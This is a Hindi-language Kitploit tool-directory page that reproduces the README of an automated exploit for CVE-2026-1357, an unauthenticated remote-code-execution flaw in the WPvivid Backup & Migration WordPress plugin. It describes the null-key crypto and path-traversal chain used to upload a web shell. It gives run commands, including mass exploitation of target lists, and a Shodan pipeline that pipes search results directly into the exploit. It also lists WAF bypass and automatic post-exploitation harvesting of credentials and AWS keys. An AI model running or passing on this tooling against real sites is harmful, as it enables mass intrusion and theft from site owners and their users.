Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-1357-POC — # CVE-2026-1357 के लिए स्वचालित शोषण उपकरण WPvivid Backup & Migration में एक अनप्रमाणित RCE (रिमोट कोड निष्पादन) के लिए स्वचालित शोषण उपकरण। WordPress लक्ष्यों को स्कैन करता है, WAF/403 को बायपास करता है, पाथ ट्रैवर्सल के माध्यम से शेल अपलोड करता है, और रिपोर्ट निर्माण के साथ पोस्ट-एक्सप्लॉइटेशन रिकॉन चलाता है। | Kitploit
उपकरण/GitHubGitHub/cybertechajju/cve-2026-1357-poc
टोहीभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनपोस्ट-शोषणWAF बाईपासपेनिट्रेशन टेस्टिंग

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

GitHub
cybertechajju/cve-2026-1357-poc

CVE-2026-1357-POC

रिपॉजिटरी देखें
816 महीने पहलेअभी तक समीक्षित नहीं

# CVE-2026-1357 के लिए स्वचालित शोषण उपकरण WPvivid Backup & Migration में एक अनप्रमाणित RCE (रिमोट कोड निष्पादन) के लिए स्वचालित शोषण उपकरण। WordPress लक्ष्यों को स्कैन करता है, WAF/403 को बायपास करता है, पाथ ट्रैवर्सल के माध्यम से शेल अपलोड करता है, और रिपोर्ट निर्माण के साथ पोस्ट-एक्सप्लॉइटेशन रिकॉन चलाता है।

साझा करें

CVE-2026-1357 — WPvivid Backup & Migration RCE

CVE क्रेडिट: Lucas Montes (NiRoX)
टूल द्वारा: CyberTechAjju
CVSS: 9.8 (क्रिटिकल) | प्रभावित: ≤ 0.9.123 | पैच किया गया: 0.9.124


⚠️ अस्वीकरण

केवल अधिकृत सुरक्षा परीक्षण के लिए। सिस्टम तक अनधिकृत पहुंच अवैध है।


अवलोकन

WPvivid Backup & Migration में दो श्रृंखलाबद्ध बगों के माध्यम से अनप्रमाणित RCE:

  1. क्रिप्टो फेल-ओपन — openssl_private_decrypt() खराब कुंजी पर false लौटाता है → phpseclib v1 इसे नल-बाइट AES कुंजी के रूप में मानता है → हमलावर 16 नल बाइट्स के साथ एन्क्रिप्ट करता है
  2. पाथ ट्रैवर्सल — अस्वच्छित name फ़ील्ड → ../uploads/shell.php बैकअप निर्देशिका से बाहर निकल जाता है

बाधा: केवल तभी शोषण योग्य जब wpvivid_api_token उत्पन्न हो और समाप्त न हुआ हो।


विशेषताएं


इंस्टॉलेशन

root@kitploit:~
git clone https://github.com/cybertechajju/CVE-2026-1357-poc.git
cd CVE-2026-1357-poc
pip install -r requirements.txt

उपयोग

root@kitploit:~
# केवल स्कैन (WordPress + WPvivid + संस्करण का पता लगाएं)
python3 cve_2026_1357.py -u http://target.com

# स्कैन + एक्सप्लॉइट + ऑटो पोस्ट-एक्सप्लॉइटेशन
python3 cve_2026_1357.py -u http://target.com --exploit

# पोस्ट-एक्सप्लॉइटेशन रिकॉन के बिना एक्सप्लॉइट
python3 cve_2026_1357.py -u http://target.com --exploit --no-post

# रिपोर्ट के साथ मास स्कैन
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report

# Burp प्रॉक्सी के माध्यम से
python3 cve_2026_1357.py -u http://target.com --exploit --proxy http://127.0.0.1:8080

# केवल-पेलोड मोड
python3 cve_2026_1357.py -u http://x --payload-only

सभी विकल्प

root@kitploit:~
-u, --url         एकल लक्ष्य URL
-l, --list        URL वाली फ़ाइल (प्रति पंक्ति एक)
--exploit         शोषण मोड सक्षम करें
--shell NAME      शेल फ़ाइलनाम (डिफ़ॉल्ट: pwn_remote.php)
--no-post         पोस्ट-एक्सप्लॉइटेशन रिकॉन छोड़ें
--report          Markdown PoC रिपोर्ट उत्पन्न करें
--report-dir DIR  रिपोर्ट आउटपुट निर्देशिका
-t, --threads N   समवर्ती थ्रेड (डिफ़ॉल्ट: 5)
--timeout SECS    अनुरोध टाइमआउट (डिफ़ॉल्ट: 10)
--proxy URL       Burp के लिए HTTP प्रॉक्सी
--payload-only    base64 पेलोड प्रिंट करें और बाहर निकलें
Screenshot_2026-02-14_00_18_14 Screenshot_2026-02-14_00_18_55

लक्ष्य खोज (डॉर्क्स)

पूरी सूची के लिए dorks.md देखें। त्वरित डॉर्क्स:

root@kitploit:~
# Shodan
http.html:"wpvivid-backuprestore"
http.html:"wpvivid" http.component:"WordPress"

# Google
inurl:"/wp-content/plugins/wpvivid-backuprestore/readme.txt"

# पाइपलाइन
shodan search 'http.html:"wpvivid-backuprestore"' --fields ip_str,port --limit 500 \
  | awk '{print "http://"$1":"$2}' > targets.txt
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report

फ़ाइलें

root@kitploit:~
CVE-2026-1357-poc/
├── cve_2026_1357.py    ← मुख्य टूल (स्कैनर + एक्सप्लॉइटर + पोस्ट-एक्सप्लॉइट)
├── dorks.md            ← Shodan/Google/Censys/FOFA/ZoomEye डॉर्क्स
├── requirements.txt    ← Python निर्भरताएँ
├── .gitignore
└── README.md           ← यह फ़ाइल

क्रेडिट

Lucas Montes (NiRoX) — CVE खोज
CyberTechAjju — एक्सप्लॉइट टूलिंग

टूल डाउनलोड करें
विशेषताविवरण
🔍 ऑटो-डिटेक्शनWordPress + WPvivid प्लगइन + संस्करण फिंगरप्रिंटिंग
🛡️ WAF बायपासUser-Agent रोटेशन, हेडर स्पूफिंग, एन्कोडिंग ट्रिक्स
🔓 403 बायपासX-Forwarded-For, X-Original-URL, पाथ नॉर्मलाइज़ेशन, डबल एन्कोडिंग
💀 ऑटो-एक्सप्लॉइटनल-कुंजी AES पेलोड + पाथ ट्रैवर्सल अपलोड
📋 पोस्ट-एक्सप्लॉइट20+ रिकॉन कमांड स्वचालित रूप से चलाता है (id, whoami, passwd, wp-config, SUID, आदि)
🔑 डेटा एक्सट्रैक्टरआउटपुट से DB क्रेडेंशियल्स, API कुंजियाँ, पासवर्ड, AWS कुंजियाँ खोजता है
📊 रिपोर्ट जनरेशनपूर्ण शोषण साक्ष्य के साथ Markdown PoC रिपोर्ट
⚡ मास स्कैनप्रॉक्सी/Burp समर्थन के साथ मल्टी-थ्रेडेड